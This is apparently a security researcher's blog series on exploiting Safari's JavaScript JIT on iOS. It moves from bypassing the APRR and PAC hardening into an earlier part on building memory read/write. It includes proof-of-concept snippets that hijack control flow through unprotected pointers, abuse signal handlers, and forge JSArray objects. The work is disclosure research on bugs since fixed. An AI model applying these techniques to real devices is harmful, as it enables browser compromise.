The first software-based mitigation against this technique in WebKit was deployed in 2016: the “Bulletproof JIT”. It worked by mapping the JIT region twice, once as r-x for execution and once as rw- for writing. The writable mapping was placed at a secret location in memory and the bulletproof JIT then relied on a --x region containing a jit_memcpy function that would copy given data into the writable JIT mapping without disclosing its secret address. However, this mitigation was rather easy to defeat due to the lack of CFI, for example via ROP. Moreover, if an attacker was able to disclose the location of the writable mapping through some means, they could simply write their shellcode to it.

The iOS JIT hardening became stronger with the addition of hardware assisted mitigations around the introduction of the iPhone Xs, namely APRR and PAC. These will be discussed next. For a fuller picture of the various iOS exploit mitigations, the interested reader is referred to the presentation “Evolution of iOS mitigations” by Siguza.

APRR

While the expansion of this acronym is not known for certain outside of Apple, its functionality is fairly well understood. Without going into too much technical detail - the interested reader is referred to Siguza's blog post on APRR for that - the goal behind APRR is essentially to enable per-thread page permissions. This is implemented by mapping page table entry permissions to their real permission with dedicated CPU registers. With that, page permissions essentially become an index into the APRR registers, which now hold the actual page permissions. As a simplified example, consider the following APRR mapping:

Page Table Entry Permission    Resulting Index    APRR Register at that Index
---                            0                  ---
--x                            1                  --x
-w-                            2                  -w-
-wx                            3                  --x
r--                            4                  r--
r-x                            5                  r-x
rw-                            6                  rw-
rwx                            7                  r-x

With the APRR register set up in this way, it would effectively enforce a strict W^X policy: no page could ever be writable and executable at the same time. 
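As a toy model of that indirection (using the example register values from the table above; this is an illustration, not Apple's implementation):

# The page-table permission bits select an index; the APRR register at that index
# holds the permissions that are actually enforced by the hardware.
APRR = ["---", "--x", "-w-", "--x", "r--", "r-x", "rw-", "r-x"]   # indices 0..7

def effective_perms(pte_perms):                 # e.g. "rwx" -> "r-x"
    idx = ((4 if "r" in pte_perms else 0) |
           (2 if "w" in pte_perms else 0) |
           (1 if "x" in pte_perms else 0))
    return APRR[idx]

assert effective_perms("rwx") == "r-x"          # JIT region: the write bit is never honored
assert effective_perms("rw-") == "rw-"          # ordinary data pages are unaffected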

In WebKit, APRR is now used to protect the JIT region: the JIT region’s page table permissions are rwx, but W^X is enforced as shown above. As such, the JIT region is effectively r-x and thus trying to directly write into it will trigger a segfault. As the JIT region has to be written into from time to time (when new code is compiled or existing code is updated), it is necessary to change the permissions of the region. This is done through a dedicated “unlock” function which changes the value of the APRR register at index 7 (corresponding to the page table permissions rwx) to rw-. However, this happens only for the thread that is about to copy data into the JIT region while the region remains r-x for all other threads. This prevents an attacker from racing the JIT compiler thread when it unlocks the region. Below is the slightly simplified source code of the performJITMemcpy function, responsible for copying code into the JIT region:

ALWAYS_INLINE void* 
performJITMemcpy(void *dst, const void *src, size_t n)
{
    os_thread_self_restrict_rwx_to_rw();
    memcpy(dst, src, n);
    os_thread_self_restrict_rwx_to_rx();
    return dst;
}

Also note the use of ALWAYS_INLINE which forces this function to be inlined at every callsite. More on that later.

APRR by itself would be fairly easy to bypass. The two main types of attacks are:
  1. ROPing, JOPing, etc. into the performJITMemcpy function (or really, a function into which it is inlined) and copying arbitrary code into the JIT region that way.
  2. As the compiler assembles machine code into a temporary heap buffer which is afterwards copied into the JIT region, it would be possible for an attacker to corrupt the machine code on the heap prior to the copy.

Enter PAC.

PAC

PAC, short for Pointer Authentication Codes, is another hardware feature which allows storing a cryptographic signature in the otherwise unused top bits of a pointer. It has been the topic of much research and is by now well documented, for example in a blogpost by Brandon Azad. With PAC enabled, every code pointer must have a valid signature which is checked before transferring control flow to it. As the PAC keys are kept in registers, they are inaccessible to an attacker who is thus unable to forge valid pointers.

PAC thus immediately prevents an attacker from performing attack 1) above. Also, since the performJITMemcpy function is marked as ALWAYS_INLINE, there will be no existing function pointers to it that would allow an attacker to call this function with controlled arguments.

Attack 2) needs additional work to mitigate. The issue mainly manifests inside the LinkBuffer::copyCompactAndLinkCode function, responsible for copying (and linking as well as possibly compacting) the previously assembled machine code into the JIT region. If an attacker was able to corrupt the heap buffer containing the machine code before this function copies it into the JIT region, the attacker would gain arbitrary code execution. This attack is mitigated by computing a PAC-based hash over the machine code during assembling, then recomputing and verifying that hash during copying. This way, it is ensured that whatever the assembler emitted is also copied into the JIT region without modifications. While it is likely possible to trick the compiler into emitting somewhat controllable code (more on that later), it is no longer generally possible to execute arbitrary instructions, as the assembler only supports a limited set of instructions.

Summary

Together, APRR and PAC achieve the following:
  • The JIT region is effectively mapped r-x and is “unlocked” only for a short period of time and only for a single thread when JIT code is updated. This prevents an attacker from writing into the JIT region directly
  • PAC is used to enforce CFI and thus prevent an attacker from performing classic code reuse attacks like ROP, JOP, etc. It is also not possible to call the performJITMemcpy function directly as it is always inlined into its callers
  • PAC is used to ensure the integrity of emitted JIT code before it is copied into the JIT region

This was the starting point for the final part of this research project. The remainder of this post will now discuss different bypass approaches.

Bypassing The JIT Hardenings

The different attacks presented next ultimately strive to gain a level of control over the program’s execution flow that is powerful enough to implement a second stage exploit (most likely some form of sandbox escape). This is what an attacker would most likely attempt to achieve in practice. It should be kept in mind, however, that without something like site isolation, an attacker with a memory read/write capability in a renderer process is usually able to construct a UXSS attack, thus gaining access to various web credentials and sessions and possibly even gaining persistence through web workers. These issues have been demonstrated in the past and will thus not be discussed further.

Shellcode-less Exploitation

First of all, it is important to note that an attacker does not necessarily need shellcode execution. For example, it is possible to abuse the Objective-C and JavaScriptCore runtimes so that arbitrary function calls and syscalls can be performed from JavaScript. This in turn can then be used to implement the next stage of an exploit chain, avoiding the need to bypass the JIT hardenings altogether. This has already been demonstrated and was thus not researched further during this project.

Similarly, while the JIT’s final output - the machine code - is protected through PAC, its intermediate outputs, in particular the various IRs - DFG, B3, and AIR - and other supporting data structures are not protected and thus are subject to manipulation by an attacker. A possible approach is thus to corrupt the JIT’s IR code in order to, for example, trick the compiler into generating calls to arbitrary functions with controlled arguments. This would likely grant a very similar primitive to the one above, i.e. being able to execute controlled syscalls, and was thus not explored further during this research.

Race Conditions

Race conditions appear to be somewhat widespread along the PAC+APRR boundary. As an example, the following is a rather typical invocation of performJITMemcpy, in this case to repatch a pointer-sized immediate value in JIT generated code:

int buffer[4];
buffer[0] = moveWideImediate(Datasize_64, MoveWideOp_Z, 0,  
                             getHalfword(value, 0), rd);
buffer[1] = moveWideImediate(Datasize_64, MoveWideOp_K, 1, 
                             getHalfword(value, 1), rd);
buffer[2] = moveWideImediate(Datasize_64, MoveWideOp_K, 2, 
                             getHalfword(value, 2), rd);
if (NUMBER_OF_ADDRESS_ENCODING_INSTRUCTIONS > 3)
    buffer[3] = moveWideImediate(Datasize_64, MoveWideOp_K, 3, 
                                 getHalfword(value, 3), rd);
performJITMemcpy(address, buffer, sizeof(int) * 4);

Here, the machine instructions necessary to load the immediate value are first emitted into a stack allocated buffer which is subsequently copied into the JIT region via performJITMemcpy. As such, if another thread managed to corrupt the stack allocated buffer before it is copied into the JIT region, the attacker would gain arbitrary code execution. However, the race window here is very small, and losing the race might cause in-use stack memory to be corrupted, possibly leading to a crash. (This code also suffers from another, theoretical bug: should NUMBER_OF_ADDRESS_ENCODING_INSTRUCTIONS ever be less than 4, then it would copy uninitialized stack memory into the JIT region…). 

Ultimately, I decided to exclude race conditions that could not safely be lost from this research project, as it can be argued that a mitigation that forces attackers to win a race while risking a process crash is in some aspect working as intended.

Unprotected Code Pointers

Another possible attack vector is cases where PAC is used incorrectly. Examples include:
  1. Places that sign a raw pointer that can be corrupted by the attacker
  2. Places that call an unsigned function pointer that can be controlled by the attacker

Finding such cases is possible through static analysis on the assembly code. While I initially wanted to use one of Binary Ninja’s ILs for this due to their support for various dataflow analyses, the lack of support for PAC instructions made this harder, so I instead went for a very simple IDAPython script which would output sequences of instructions ending in a PAC signing instruction such as PACIZA. When run on a DyldSharedCache image, the script would output many thousands of lines such as

libz.1:__text:0x1b6ba1444  ADRL X16, sub_1B6BA9434; PACIZA X16

This “gadget” essentially takes a constant (the address of sub_1B6BA9434) and signs it using the A key and a context of zero. As such, it is not very interesting for an attacker as the signed value cannot be controlled. After filtering out such obviously safe code snippets, one remaining and frequently occurring code pattern looked like this:

ADRP            X16, #<imported_function_ptr>@PAGE
LDR             X16, [X16,#<imported_function_ptr>@PAGEOFF]
PACIZA          X16

This code snippet loads a raw pointer from a writable page, then signs it using the PACIZA instruction. As such, an attacker can bypass PAC by overwriting the raw pointer in memory, then somehow getting this code to execute. It appears that the compiler emitted this vulnerable code every time a function from a different compilation unit was referenced as a pointer instead of being called directly. This particular code snippet was the machine code of the following C++ code in JavaScriptCore:

LValue Output::doublePow(LValue xOperand, LValue yOperand)
{
    double (*powDouble)(double, double) = pow;
    return callWithoutSideEffects(B3::Double, powDouble, xOperand, yOperand);
}

This function is used by the JIT compiler when a Math.pow invocation that is known to operate on double values is optimized. In that case, the compiler emits a call to the C pow function, and for that loads and signs its address with this function. Due to the bug in the compiler, the imported function pointer was, however, placed in a writable section and not protected by PAC. The PoC for this issue is then quite simple:

// offset from iOS 13.4.1, iPhone Xs
let powImportAddr = Add(jscBase, 0x34e1d570);
memory.writePtr(powImportAddr, new Int64('0x41414141'));

function trigger(x) {
    return Math.pow(x, 13.37);
}
for (let i = 0; i < 10000000; i++) {
    trigger(i + 0.1);
}

This will result in a crash with PC=0x41414141, demonstrating that PAC has been bypassed.

Searching with a slightly modified IDAPython script for the second vulnerability type, a call to an unprotected pointer, also resulted in an interesting code snippet:

MOV             W9, #0x6770
ADRP            X16, #<__chkstk_darwin_ptr>@PAGE
LDR             X16, [X16,#<__chkstk_darwin_ptr>@PAGEOFF]
BLR             X16

This code, found at the start of many large functions, branches to the __chkstk_darwin function, which is likely responsible for preventing a huge stackframe from “jumping over” a stack guard page in case of a stack overflow. For some reason however, the pointer to that function was loaded from a writable memory region and was also not protected by PAC. As such, it was again possible to execute arbitrary code as demonstrated by the following code snippet:

// offset from iOS 13.4.1, iPhone Xs
let __chkstk_darwin_ptr = Add(jscBase, 0x34e1d430);
memory.writePtr(__chkstk_darwin_ptr, new Int64('0x42424242'));

// Just need to trigger FTL compilation now, we'll crash in FTL::lowerDFGToB3
function foo(x) {
    return Math.pow(x, 13.37);
}
for (let i = 0; i < 10000000; i++) {
    foo(i + 0.1);
}

This works because of the widespread use of __chkstk_darwin in basically any function with a large stack frame, one of which, namely FTL::lowerDFGToB3, is executed during JIT compilation.

The two issues were reported to Apple as Project Zero issue #2044 and were subsequently fixed in iOS 13.6 on July 15th and assigned CVE-2020-9870. The IDAPython script used to find these gadgets can also be found in the report for issue #2044.

Manipulating Mach Messages

Inspired by various chats with fellow Project Zero team member Brandon Azad, the idea behind this bypass is to corrupt a mach message struct before it is sent out via the mach_msg syscall. On iOS and macOS, a large portion of the kernel interface, the entire IOKIT driver interface, as well as basically all userspace IPC is implemented through mach messages, making this a powerful exploit primitive. For example, it should be possible to (ab)use virtual memory related mach syscalls to bypass PAC and/or APRR by changing memory protections or remapping pages. Alternatively, controlling mach messages would again allow implementing a stage 2 exploit from JavaScript, unless the ability to perform BSD syscalls was required for it.

A simple, yet imperfect approach to find code that sends mach messages is to hook the mach_msg function with a Frida script, then deduplicate its invocations based on their callstack. This is imperfect as it will miss code paths that are rarely executed during normal operations, but is very quick to implement. Doing this in a WebKit renderer process shows a handful of groups of related calls to mach_msg, stemming from mach syscalls as well as IPC and XPC communication.

Ultimately, all of these cases appeared to be race conditions, as the constructed mach message was in most cases sent out immediately, without lingering in memory for some (ideally attacker-controllable) time during which it could be corrupted. As losing the race in these cases results in either heap (in the case of IPC and XPC communication) or stack (in the case of mach syscalls) corruption, the races can likely not safely be repeated, and thus these cases didn’t meet the requirements for a reliable bypass technique.

Abusing Signal Handlers

PAC (like many other mitigations) relies on crashing the process in order to stop the attacker. An interesting target are thus signal handling mechanisms that can interrupt the crashing process.

WebKit has support for signal handling inside the renderer process, which it uses for some JavaScriptCore optimizations. For example, JSC supports an execution mode for WASM code where all bounds checks are omitted, but where the WASM heap is followed by a 32GB guard region. Since WASM memory accesses use 32bit indices, if an invalid access occurs in WASM, it will always access a guard page, cause a segfault, and then run the WASM signal handler. The handler will then repatch the WASM code so that the faulting thread will raise a JavaScript exception upon resuming.

Exception handling in WebKit is based on the mach exception handling infrastructure instead of the UNIX signal handling facilities. Here is a brief overview of how it works:
  1. When an exception occurs in some renderer thread, a GCD worker thread is woken up by the kernel to handle the exception
  2. The thread executes mach_msg_server_once, which fetches the mach message describing the exception from the kernel, allocates the reply message, then passes both to a handler function
  3. _Xmach_exception_raise_state_identity, an auto-generated MIG function, is the registered handler for exception messages. It will dissect the input mach message, extracting values like the register contents at the time of the crash, then execute the “real” handler function:
  4. catch_mach_exception_raise_state will now iterate over a linked list of registered handlers (such as the WASM fault handler) and execute each one of them, also passing them the output register state which they can modify. Depending on whether one of the handlers handled the exception, this function will return KERN_SUCCESS or KERN_FAILURE
  5. Back in _Xmach_exception_raise_state_identity, the return value as well as the output register state are used to populate the reply message
  6. mach_msg_server_once finally sends the reply message to the kernel, then returns control to GCD
  7. The kernel will now either resume the crashed thread with the output register state if the return value was KERN_SUCCESS, otherwise terminate it

The process is visualized again in the following graphic.

Image: The interaction between different system components during mach exception handling


This now enables the following attack:

  1. The singly-linked list of handlers is corrupted and turned into a cycle. This is possible because, in contrast to the handler function pointers, the next pointers of the list elements are not protected by PAC
  2. An access violation is caused in a separate thread. This will cause a GCD thread to become “stuck” in catch_mach_exception_raise_state, looping infinitely due to the cycle
  3. A thread under the attacker's control now searches through all thread stacks (they are allocated contiguously in memory) looking for the return address of catch_mach_exception_raise_state. Once found, it now also has access to the reply mach message as a pointer to it is spilled on the stack. The reply message can then directly be manipulated by the attacker. In particular, the new register state (except for PC, which is protected by PAC) and the return value, indicating whether the exception was handled or not, can now be set.
  4. The spilled pointer on the stack is replaced with a different one to cause _Xmach_exception_raise_state_identity to write the actual return value of the signal handler (which will be KERN_FAILURE) into a different memory location while its caller, mach_msg_server_once will send the attacker-controlled reply message back to the kernel
  5. The thread fixes up the handler list, causing the handler thread to break out of the loop and return from catch_mach_exception_raise_state. The kernel will now receive a completely attacker controlled reply message and will thus resume the crashed thread with attacker controlled register (and stack) context

This is quite a strong exploitation primitive, essentially enabling the construction of a small “debugger” capable of breaking on most data accesses in the program and able to change the execution context at those points mostly arbitrarily. This can in turn be used in multiple ways to bypass PAC and/or APRR. Possible ideas include:

  • Corrupt the AssemblerBuffer so arbitrary instructions are copied into the JIT region by the LinkBuffer. This will cause the computed hashes to mismatch and the linker to crash, but that only happens after the instructions have been copied and the crash can then simply be caught
  • Crash during one of the writes into the JIT region in LinkBuffer::copyCompactAndLinkCode (by corrupting the destination pointer prior to that) and change the content of the source register so that an arbitrary instruction is written into the JIT region while the original instruction is used for the hash computation
  • Crash during LinkBuffer::copyCompactAndLinkCode and resume execution somewhere else. This should leave the JIT region writable (although not executable) for that thread
  • Brute-force a PAC code (e.g. by repeatedly accessing, crashing, and then changing a PAC protected pointer), then JOP into one of the functions into which performJITMemcpy is inlined

A simple PoC demonstrating how this technique works (or, by now, used to work) can be found in the published proof of concept exploit code in the pwn.js file. It implements a simple PAC bypass with this “debugger” for TypedArrays by corrupting a PAC-protected buffer pointer, catching the exception during its access, then changing the register holding the raw pointer and resuming execution.

This issue was reported to Apple as Project Zero issue #2042. It was then fixed in WebKit HEAD with commit 014f1fa8c2 (only 6 days after the report) by initializing the signal handlers when the JavaScript engine is initialized, then marking the memory region holding the signal handlers as read-only. This prevents an attacker from modifying the list. The fix was shipped to users with iOS 13.6 on July 15th and the issue was assigned CVE-2020-9910.

Variants

This “bug” pattern is a bit more general and also not strictly related to signal handling. As an example, consider the following code from LinkBuffer::copyCompactAndLinkCode:

if (verifyUncompactedHash.finalHash() != expectedFinalHash) {
    dataLogLn("Hashes don't match: ", ...);
    dataLogLn("Crashing!");
    CRASH();
}

This code is executed if, during linking and copying of the assembled code, JSC determines that the machine code has been corrupted as the cryptographic hashes don’t match. The problem here is that an attacker might be able to corrupt data in a way that causes dataLogLn, a nontrivial function, to block or spin infinitely, for example by corrupting a lock or making some loop run forever. In that case, the attacker-controlled machine code will already have been copied into the JIT region and can afterwards be executed by the attacker in another thread without fear of losing a race against CRASH(). This potential variant was likely identified by Apple shortly after the original issue was reported to them, then fixed in WebKit with commit e87946b7a8.

As another example, the following function was called by JSC just before it was going to CRASH() when it encountered an incorrect PAC signature (WebKit’s PtrTag mechanism is based on PAC), indicating corruption of critical data by an attacker:

void reportBadTag(const void* ptr, PtrTag expectedTag)
{
    dataLog("PtrTag ASSERTION FAILED on pointer ", RawPointer(ptr), ", actual tag = ", tagForPtr(ptr));
    ...
}

The tagForPtr call actually ends up traversing a linked list:

static const char* tagForPtr(const void* ptr)
{
    PtrTagLookup* lookup = s_ptrTagLookup;
    while (lookup) {
        const char* tagName = lookup->tagForPtr(ptr);
        if (tagName)
            return tagName;
        lookup = lookup->next;
    }

    ...

As such, by turning this list into a cycle, it again became possible to prevent crashing due to a PAC failure. This in turn allows a brute-force attack against PAC or possibly leaking a validly signed, arbitrary pointer as documented in the report for this variant. This variant was reported to Apple as a variant of Project Zero issue #2042, then fixed with commits 13e30ec7a5 and db8b3982f2.

Finally, even “broader” variants of this issue may exist: if there is code that spills sensitive values (e.g. raw pointers after authentication) to the stack temporarily before performing actions that can be made to block by the attacker (e.g. a loop or a lock operation), then an attacker might be able to corrupt sensitive data without having to win a race. No such places were identified during this research, though.

Summary

In essence, every bit of code that executes after a failure condition has been detected but before the process is ultimately terminated should be considered as an attack surface, with the attacker potentially “winning” if they are able to make this code block. With signal handling, this becomes even more complex as code such as

if (security_failure) {
    CRASH();
}

is in fact more like

if (security_failure) {
    signal_handler();
    CRASH();
}

Ideally, signal handling would thus be removed entirely from critical processes, or at least restricted to fewer signals. All in all, the speed at which these fixes were implemented implies that Apple is committed to PAC (and APRR) as a serious security mitigation.

Conclusion 

This post discussed multiple ways for bypassing WebKit’s JIT hardenings. While some approaches didn’t work or weren’t attempted further for various reasons, two previously unknown (at least publicly…) issues, as well as multiple variants thereof, were discovered that allowed for reliable bypasses. They were reported to Apple and subsequently fixed in iOS 13.6 as CVE-2020-9870 and CVE-2020-9910.

This post also concludes the three-part series. All in all it was a substantial time investment to first find a suitable vulnerability, then bypass the various exploit mitigations with it. However, it is important to keep in mind that a large part of this effort is a one-time cost for an attacker, required for the first exploit developed. Afterwards, the attacker can likely reuse the majority of the previous exploit work for subsequent vulnerabilities. On the other hand, once mitigation bypasses are treated similarly to vulnerabilities and fixed swiftly when reported (as well as included in bug-bounty programs), this argument becomes weaker as an attacker is now disrupted if either their vulnerability or their mitigation bypass is reported or otherwise found by the vendor. In addition to the exploited vulnerability, Apple also quickly fixed the PAC bypasses and assigned CVE numbers for them. It was pleasing to see Apple's commitment to fixing the mitigation bypasses quickly, and I hope that they continue to do so in the future.

While logic vulnerabilities will likely allow for sandbox escapes for the foreseeable future and are largely unaffected by exploit mitigation technologies, it seems plausible that a typical exploit chain will still require renderer shellcode execution (or at least something roughly equivalent). Since some form of memory corruption is likely required for that, developing and maintaining memory corruption mitigations at various levels (close to the initial bug with MTE, during the early exploitation phase with the Gigacage and StructureID randomization, and after read/write has already been achieved through PAC and APRR) alongside stronger sandboxing, appears, generally speaking, to be a worthwhile investment.

JITSploitation II: Getting Read/Write

Posted by Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

This is the second part in a series about a Safari renderer exploit from a JIT bug. In Part 1, a vulnerability in the DFG JIT’s implementation of Common-Subexpression Elimination was discussed. The second part starts from the well-known addrof and fakeobj primitives and shows how stable, arbitrary memory read/write can be constructed from them. For that, the StructureID randomization mitigation and the Gigacage will be discussed and bypassed.

Overview

Back in 2016, an attacker would use the addrof and fakeobj primitives to fake an ArrayBuffer, thus immediately gaining a reliable arbitrary memory read/write primitive. But in mid 2018, WebKit introduced the “Gigacage”, which attempts to stop abuse of ArrayBuffers in that way. The Gigacage works by moving ArrayBuffer backing stores into a 4GB heap region and using 32bit relative offsets instead of absolute pointers to refer to them, thus making it (more or less) impossible to use ArrayBuffers to access data outside of the cage.

However, while ArrayBuffer storages are caged, JSArray Butterflies, which contain the array’s elements, are not. As they can store raw floating point values, an attacker immediately gains a fairly powerful arbitrary read/write by faking such an “unboxed double” JSArray. This is how various public exploits have worked around the Gigacage in the past. (Un)fortunately, WebKit has introduced a mitigation aimed at stopping an attacker from faking JavaScript objects entirely: StructureID randomization. This mitigation will thus have to be bypassed first.

As such, this post will
  • Explain the in-memory layout of JSObjects
  • Bypass the StructureID randomization to fake a JSArray object
  • Use the faked JSArray object to set up a (limited) memory read/write primitive
  • Break out of the Gigacage to get a fast, reliable, and truly arbitrary read/write primitive

Let’s go. 

Faking Objects

In order to fake objects, one has to know their in-memory layout. A plain JSObject in JSC consists of a JSCell header followed by the “Butterfly” and possibly inline properties. The Butterfly is a storage buffer containing the object’s properties and elements as well as the number of elements (the length):

Image: Layout of a JSC Butterfly in memory

Objects such as JSArrayBuffers add further members to the JSObject layout. 

Each JSCell header references a Structure through its StructureID field, which is an index into the runtime’s StructureIDTable. A Structure is basically a blob of type information, containing things such as:
  • The base type of the object, such as JSObject, JSArray, JSString, JSUint8Array, …
  • The properties of the object and where they are stored relative to the object
  • The size of the object in bytes
  • The indexing type, which indicates the type of array elements stored in the butterfly, such as JSValue, Int32, or unboxed double, and whether they are stored as one contiguous array or in some other way, for example in a map.
  • Etc.

Finally, the remaining JSCell header bits contain things like the GC marking state and “cache” some of the frequently used bits of type information, such as the indexing type. The image below summarizes the in-memory layout of a plain JSObject on a 64bit architecture.

Image: Layout of a JSC JSObject in memory


Most operations performed on an object will have to look at the object’s Structure to determine what to do with the object. As such, when creating fake JSObjects, it is necessary to know the StructureID of the type of object that is to be faked. Previously, it was possible to use StructureID Spraying to predict StructureIDs. This worked by simply allocating many objects of the desired type (for example, Uint8Array) and adding a different property to each of them, causing a unique Structure and thus StructureID to be allocated for that object. Doing this maybe a thousand times would virtually guarantee that 1000 was a valid StructureID for a Uint8Array object. This is where StructureID randomization, a new exploit mitigation from early 2019, now comes into play.
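
For reference, the pre-randomization spraying technique just described might have looked roughly like this (an illustrative sketch, not code from the original exploit):

let sprayed = [];
for (let i = 0; i < 1000; i++) {
    let a = new Uint8Array(8);
    a['prop' + i] = 1337;    // unique property name => new Structure => new StructureID
    sprayed.push(a);         // keep the arrays (and thus their Structures) alive
}
// With sequentially allocated IDs, an ID around 1000 would now very likely
// belong to one of the sprayed Uint8Array Structures.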

StructureID Randomization

The idea behind this exploit mitigation is straightforward: as an attacker (supposedly) needs to know a valid StructureID to fake objects, randomizing the IDs will hamper that. The exact randomization scheme is well documented in the source code. With that, it is no longer possible to predict a StructureID.

There are different approaches to bypass StructureID randomization, including:
  1. Leaking a valid StructureID, e.g. through an OOB read
  2. Abusing code that does not check the StructureID, as has already been demonstrated
  3. Constructing a "StructureID oracle" to brute force a valid StructureID

A possible idea for the "StructureID oracle" is to abuse the JIT again. One very common code pattern emitted by the compiler are StructureChecks to guard type speculations. In pseudo-C they look roughly like this: 

int structID = LoadStructureId(obj)
if (structID != EXPECTED_STRUCT_ID) {
    bailout();
}

This could allow the construction of a “StructureID oracle”: if a JIT compiled function can be constructed that checks, but then doesn’t use a structure ID, then an attacker should be able to determine whether a StructureID is valid by observing whether a bailout had occurred. This in turn should be possible either through timing, or by “exploiting” a correctness issue in the JIT that causes the same code to produce different results when run in the JIT vs in the interpreter (where execution would continue after a bailout). An oracle like this would then allow an attacker to brute force a valid structure ID by predicting the incrementing index bits and brute forcing the 7 entropy bits.

However, leaking a valid StructureID and abusing code that doesn't check the StructureID seem like the easier options. In particular, there is a code path in the interpreter when loading elements of a JSArray that never accesses the StructureID:

static ALWAYS_INLINE JSValue getByVal(VM& vm, JSValue baseValue, JSValue subscript)
{
    ...;
    if (subscript.isUInt32()) {
        uint32_t i = subscript.asUInt32();
        if (baseValue.isObject()) {
            JSObject* object = asObject(baseValue);
            if (object->canGetIndexQuickly(i))
                return object->getIndexQuickly(i);

Here, getIndexQuickly directly loads the element from the butterfly, and canGetIndexQuickly only looks at the indexing type in the JSCell header (for which the values are known constants) and the length in the butterfly:

bool canGetIndexQuickly(unsigned i) const {
    const Butterfly* butterfly = this->butterfly();
    switch (indexingType()) {
    ...;
    case ALL_CONTIGUOUS_INDEXING_TYPES:
        return i < butterfly->vectorLength() && butterfly->contiguous().at(this, i);
}

This now allows faking something that looks a bit like a JSArray, pointing its backing storage pointer onto another, valid JSArray, then reading that JSArray’s JSCell header which includes a valid StructureID:

Image: Technique to achieve memory read/write through a corrupted JSArray


At that point, the StructureID randomization is fully bypassed.

The following JavaScript code implements this, faking the object as usual by (ab)using inline properties of a “container” object:

let container = {
    jscell_header: jscell_header,
    butterfly: legit_float_arr,
};

let container_addr = addrof(container);
// add offset from container object to its inline properties
let fake_array_addr = Add(container_addr, 16);  
let fake_arr = fakeobj(fake_array_addr);

// Can now simply read a legitimate JSCell header and use it.
jscell_header = fake_arr[0];
container.jscell_header = jscell_header;

// Can read/write to memory now by corrupting the butterfly
// pointer of the float array.
fake_arr[1] = 3.54484805889626e-310;    // 0x414141414141 in hex
float_arr[0] = 1337;

This code will crash while accessing memory around 0x414141414141. As such, the attacker has now gained an arbitrary memory read/write primitive, albeit a slightly limited one:
  • Only valid double values can be read and written
  • As the Butterfly also stores its own length, it is necessary to position the butterfly pointer such that its length appears large enough to access the desired data
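
Despite these limitations, the primitive is convenient to wrap in small helper functions. The following is a hedged sketch in the style of the exploit's utility code (reusing the Int64 helpers seen elsewhere in this series); it is an illustration rather than the exploit's exact implementation and it glosses over the butterfly-length caveat from the second bullet above:

// Point float_arr's butterfly at |addr| (an Int64), so that float_arr[0]
// then aliases the 8 bytes at that address.
function read64(addr) {
    fake_arr[1] = addr.asDouble();
    return Int64.fromDouble(float_arr[0]);
}

function write64(addr, value) {
    fake_arr[1] = addr.asDouble();
    float_arr[0] = value.asDouble();    // only valid doubles can be written this way
}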

A Note on Exploit Stability

Running the current exploit would yield memory read/write, but would likely crash soon after when the garbage collector runs the next time and scans all reachable heap objects.

The general approach to achieve exploit stability is to keep all heap objects in a functioning state (one that will not cause the GC to crash when it scans the object and visits all outgoing pointers), or, if that is not possible, to repair them as soon as possible after corruption. In the case of this exploit, the fake_arr is initially “GC unsafe” as it contains an invalid StructureID. When its JSCell is later replaced with a valid one (container.jscell_header = jscell_header;) the faked object becomes “GC safe” as it appears like a valid JSArray to the GC.

However, there are some edge cases that can lead to corrupted data being stored in other places of the engine as well. For example, the array load in the previous JavaScript snippet (jscell_header = fake_arr[0];) will be performed by a get_by_val bytecode operation. This operation also keeps a cache of the last seen structure ID, which is used to build the value profiles relied on by the JIT compiler. This is problematic, as the structure ID of the faked JSArray is invalid and will thus lead to crashes, for example when the GC scans the bytecode caches. However, the fix is fortunately fairly easy: execute the same get_by_val op twice, the second time with a valid JSArray, whose StructureID will then be cached instead:

...
let fake_arr = fakeobj(fake_array_addr);
let legit_arr = float_arr;
let results = [];
for (let i = 0; i < 2; i++) {
    let a = i == 0 ? fake_arr : legit_arr;
    results.push(a[0]);
}
jscell_header = results[0];
...

Doing this makes the current exploit stable across GC executions.

Breaking out of the (Giga-)Cage

Note: this part is mostly a fun exercise in JIT exploitation and not strictly required for the exploit as it has already constructed a strong enough read/write primitive. However, it makes the exploit faster as the read/write gained from this is more performant and also truly arbitrary.

Somewhat contrary to the description at the beginning of this post, ArrayBuffers in JSC are actually protected by two separate mechanisms:

The Gigacage: a multi-GB virtual memory region in which the backing storage buffers of TypedArrays (and some other objects) are allocated. Instead of a 64bit pointer, the backing storage pointer is now basically a 32bit offset from the base of the cage, preventing access outside of it.

The PACCage: In addition to the Gigacage, TypedArray backing store pointers are now also protected through pointer authentication code (PAC) where available, preventing tampering with them on the heap as an attacker will generally be unable to forge a valid PAC signature. 

The exact scheme used to combine the Gigacage and the PACCage is documented for example in commit 205711404e. With that, TypedArrays are essentially doubly-protected and so evaluating whether they can still be abused for read/write seemed like a worthwhile endeavour. One place to look for potential issues is again in the JIT as it has special handling for TypedArrays to boost performance.

TypedArrays in DFG

Consider the following JavaScript code.

function opt(a) {
    return a[0];
}

let a = new Uint8Array(1024);
for (let i = 0; i < 100000; i++) opt(a);

When optimizing in DFG, the opt function would be translated to roughly the following DFG IR (with many details omitted):

CheckInBounds a, 0
v0 = GetIndexedPropertyStorage
v1 = GetByVal v0, 0
Return v1

What is interesting about this is the fact that the access to the TypedArray has been split into three different operations: a bounds check on the index, a GetIndexedPropertyStorage operation, responsible for fetching and uncaging the backing storage pointer, and a GetByVal operation which will essentially translate to a single memory load instruction. The above IR would then result in machine code looking roughly as follows, assuming that r0 held the pointer to the TypedArray a:

; bounds check omitted
Lda r2, [r0 + 24];
; Uncage and unPAC r2 here
Lda r0, [r2]
B lr

However, what would happen if no general purpose register was available for GetIndexedPropertyStorage to store the raw pointer into? In that case, the pointer would have to be spilled to the stack. This could then allow an attacker with the ability to corrupt stack memory to break out of both cages by modifying the spilled pointer on the stack before it is used to access memory by a GetByVal or SetByVal operation.
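
To make this concrete, a spilled variant of the machine code shown above might look roughly as follows (same illustrative pseudo-assembly as before, not actual JIT output):

; bounds check omitted
Lda r2, [r0 + 24]
; Uncage and unPAC r2 here
Str r2, [sp + 0x40]    ; no free register: raw storage pointer spilled to the stack
; ... other operations keeping all general purpose registers busy ...
; (a corrupted spill slot would go unnoticed here)
Lda r2, [sp + 0x40]    ; reload the (possibly corrupted) raw pointer
Lda r0, [r2]           ; memory access through it
B lr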

The rest of this blog post will describe how such an attack can be implemented in practice. For that, three main challenges have to be solved:
